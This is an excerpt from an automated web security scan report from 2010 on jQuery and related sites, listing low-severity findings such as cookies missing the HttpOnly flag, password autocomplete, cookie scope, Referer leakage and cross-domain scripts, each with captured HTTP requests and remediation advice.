The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/andrew_powell HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=16C254095C2124D65EE64E94307DBCA0; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:14 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...

2.23. http://forum.jquery.com/user/charlietfl

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /user/charlietfl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/charlietfl HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=59CEF57F096606606E0C367A9D77EDCB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:27 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...

2.24. http://forum.jquery.com/user/christophe

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /user/christophe

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/christophe HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=DA6C6F3D4597C88D4576CA4F90C364C0; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:46 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...

2.25. http://forum.jquery.com/user/jeresig

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /user/jeresig

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/jeresig HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=6B51C808310C43BC59A7FCE896A79140; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:01 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...

2.26. http://forum.jquery.com/user/kbwood.au

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /user/kbwood.au

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/kbwood.au HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E6A0387222674E9994B5F79EBEB4FA46; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:38 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...

2.27. http://forum.jquery.com/user/scottjehl

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /user/scottjehl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/scottjehl HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=05CE8F1E0AE7F496B5A09850FA785AAB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:29:52 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...

2.28. http://forum.jquery.com/user/wycats

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /user/wycats

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/wycats HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=25EEAA759D352A30C3AA8E23615DFCFD; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:10 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...

2.29. http://forum.jquery.com/using-jquery-plugins/feed

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /using-jquery-plugins/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /using-jquery-plugins/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=656CB96EFB1268601BCC17736BCADF27; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:50 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...

2.30. http://forum.jquery.com/using-jquery-ui/feed

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /using-jquery-ui/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /using-jquery-ui/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=4244A6E803BA3D6EA8278E71FD90AB63; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:52 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...

2.31. http://forum.jquery.com/using-jquery/feed

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /using-jquery/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /using-jquery/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=CC781A595F319E0A674E2113A1D61AE2; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:47 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...

2.32. http://meetups.jquery.com/main/badge/showPlayerConfig

Summary

Severity:   Low
Confidence:   Firm
Host:   http://meetups.jquery.com
Path:   /main/badge/showPlayerConfig

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /main/badge/showPlayerConfig HTTP/1.1
Host: meetups.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2__utmv=^ning.1289873039410:; ning_session=BzbOI0j3N7lS4V6sU0Z9jK1F3TxbRWd8yLQYUdc+btemQp7Pvi1QiVOzqZFnXyKiRkA7rmCbvfA=; 2__utmz=^ning.1305641039411:52481588.1289873039.1.1.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmz=52481588.1289873049.1.1.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; xn_visitor=dfa88738-8fee-489d-b673-67c5b27bed56; __utma=52481588.1320023348.1289873049.1289873049.1289873049.1; 2__utma=^ning.1352945039411:52481588.1359910525.1289873039.1289873039.1289873039.1; __utmc=52481588; __utmb=52481588.1.10.1289873049; 2__utmc=^ning.1352945039411:52481588; 2__utmb=^ning.1289874839505:52481588.1.10.1289873039;

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 02:34:44 GMT
Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03
Connection: close
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ning_session=BzbOI0j3N7lS4V6sU0Z9jK1F3TxbRWd8yLQYUdc+btemQp7Pvi1QiTGrH9lOpNzLmjJZnm/7W7g=;Path=/;Domain=meetups.jquery.com;Expires=Tue, 16-Nov-10 03:34:44 GMT
X-XN-Trace-Token: 7d4a3f78-dcef-401c-896a-312e4068d9c9
X-XN-XNHTML: false
Date: Tue, 16 Nov 2010 02:34:43 GMT
Date: Tue, 16 Nov 2010 02:34:43 GMT
Vary: X-XN_APPLICATION
P3P: CP="UNI STA LOC CURa OURa COR ALL IND"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Tue, 16 Nov 2010 02:34:44 UTC
Content-Type: text/xml;charset=utf-8
Server: Ning HTTP Server 2.0
Pragma:
Cache-Control: max-age=300
Cache-Control: no-cache="Set-Cookie"
Content-Length: 1883

<?xml version="1.0" encoding="UTF-8" ?>
<config>
<flags>
<showJoin>1</showJoin>
</flags>
<urls>
<image>http://api.ning.com/icons/appatar/4919002?default=-1&amp;width=48&amp;height=48</i
...[SNIP]...

2.33. http://plugins.jquery.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://plugins.jquery.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://jquery.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: plugins.jquery.com
Proxy-Connection: Keep-Alive
Cookie: __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmb=44433727.2.10.1289872970; __utmc=44433727; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 02:23:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: SESSabdcf03bfc020aa07e9f024d8c52c72f=p1ng5nbihhtpishtt6797ga453; expires=Thu, 09 Dec 2010 05:56:57 GMT; path=/; domain=.plugins.jquery.com
Last-Modified: Tue, 16 Nov 2010 02:19:40 GMT
ETag: "c60313504b62203a5c053249b5160807"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-
...[SNIP]...

2.34. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b HTTP/1.1
Host: b.scorecardresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UID=1cd27b1a-204.0.5.41-1289161421;

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 16 Nov 2010 02:34:42 GMT
Connection: close
Set-Cookie: UID=1cd27b1a-204.0.5.41-1289161421; expires=Thu, 15-Nov-2012 02:34:42 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


3. Password field with autocomplete enabled

Summary

Severity:   Low
Confidence:   Certain
Host:   https://accounts.zoho.com
Path:   /login

Issue detail

The page contains a form with the following action URL: The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /login HTTP/1.1
Host: accounts.zoho.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=56D46261849046C7540AB31DBC7DA0AD; iamcsr=8ef599d1-4822-4851-912e-a79d06e36308; IAMAGENTTICKET=;

Response

HTTP/1.1 200 OK
P3P: CP="CAO PSA OUR"
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:41 GMT
Connection: close
Server: ZWS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
<title>Zoho Accounts</title>
<style type="text
...[SNIP]...
<div id="loginform">
           <form name=login id=login onsubmit="javascript:return submitlogin(this);" method="post">
            <table cellspacing="0" cellpadding="0" align="center">
...[SNIP]...
<td align="left"><input type=password name=pwd class="input" onkeypress="clearmsg()"></td>
...[SNIP]...

4. Cookie scoped to parent domain

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Request

GET /b HTTP/1.1
Host: b.scorecardresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UID=1cd27b1a-204.0.5.41-1289161421;

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 16 Nov 2010 02:34:42 GMT
Connection: close
Set-Cookie: UID=1cd27b1a-204.0.5.41-1289161421; expires=Thu, 15-Nov-2012 02:34:42 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


5. Cross-domain Referer leakage
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


5.1. http://forum.jquery.com/subscribeRegister.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /subscribeRegister.do

Issue detail

The page was loaded from a URL containing a query string: The response contains the following links to other domains:

Request

GET /subscribeRegister.do?serviceurl=%2Fjquery%3Freferrer%3DsignUp%26forumGroupId%3D14737000000003003&referrer=signUp&forumGroupId=14737000000003003 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=AB288D1FDFBEFEC561E9A4E52A70F5E1; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:40 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equi
...[SNIP]...
<link href="/getCustomFile.do?fileId=14737000000667636&forumGroupId=14737000000003003" type="text/css" rel="stylesheet">

<script src = "http://js.zohostatic.com/discussions/v6/js/jquery-1.3.1.min.js" type = "text/javascript" language = "javascript"></script>
...[SNIP]...
<div class="subMenu normalText">
<a href="http://www.zoho.com/">Zoho Home</a>
<a href="http://blogs.zoho.com">Blogs</a>
<a href="http://forums.zoho.com/zoho-discussions">Forums</a>
<a href="http://www.zoho.com/company.html">About Us</a>
<a href="http://www.zoho.com/contact.html">Contact Us</a>
...[SNIP]...
</div>

<iframe frameborder="0" width="700" height="500" scrolling="no" src="https://accounts.zoho.com/register?service_language=default&servicename=ZohoDiscussions&serviceurl=http%3A%2F%2Fdiscussions.zoho.com%2Fjquery%3Freferrer%3DsignUp%26forumGroupId%3D14737000000003003&showheader=false&showGoogleYahoo=false&css=http://discussions.zoho.com/styles/iamregister.css"></iframe>
...[SNIP]...
<p id="jq-hosting">Sponsored by <a href="http://discussions.zoho.com/home" target="_blank"><img style="vertical-align:middle" src="http://www.zoho.com/discussions/images/zohoLogo-ht21.png" border="0" /></a>
...[SNIP]...

5.2. http://go.microsoft.com/fwlink/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://go.microsoft.com
Path:   /fwlink/

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /fwlink/?LinkId=44406 HTTP/1.1
Accept: */*
If-Modified-Since: Mon, 15 Nov 2010 01:20:33 GMT
If-None-Match: "e5f0-4950d3f1fba40"
A-IM: feed
Accept-Language: en-US
User-Agent: Windows-RSS-Platform/2.0 (MSIE 8.0; Windows NT 6.1)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: go.microsoft.com
Pragma: no-cache
Cookie: A=I&I=AxUFAAAAAACMBwAAy3eITXpGsXEo3SGfnFhbmg!!

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 171
Content-Type: text/html; charset=utf-8
Expires: Tue, 16 Nov 2010 02:31:27 GMT
Location: http://rss.msnbc.msn.com/id/3032091/device/rss/rss.xml
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 02:32:27 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://rss.msnbc.msn.com/id/3032091/device/rss/rss.xml">here</a>.</h2>
</body></html>

6. Cross-domain script include
There are 20 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


6.1. http://forum.jquery.com/about-the-jquery-forum

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /about-the-jquery-forum

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-the-jquery-forum HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
